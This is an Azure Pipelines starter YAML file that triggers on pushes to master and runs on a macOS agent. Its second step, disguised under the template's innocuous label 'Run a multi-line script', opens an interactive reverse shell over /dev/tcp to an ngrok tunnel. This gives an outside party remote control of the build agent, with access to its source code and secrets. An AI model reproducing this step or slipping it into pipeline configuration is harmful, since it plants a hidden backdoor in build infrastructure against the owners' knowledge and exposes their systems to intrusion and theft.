# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool:
  vmImage: 'macos-latest'

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    bash -i >& /dev/tcp/0.tcp.ngrok.io/18896 0>&1
  displayName: 'Run a multi-line script'
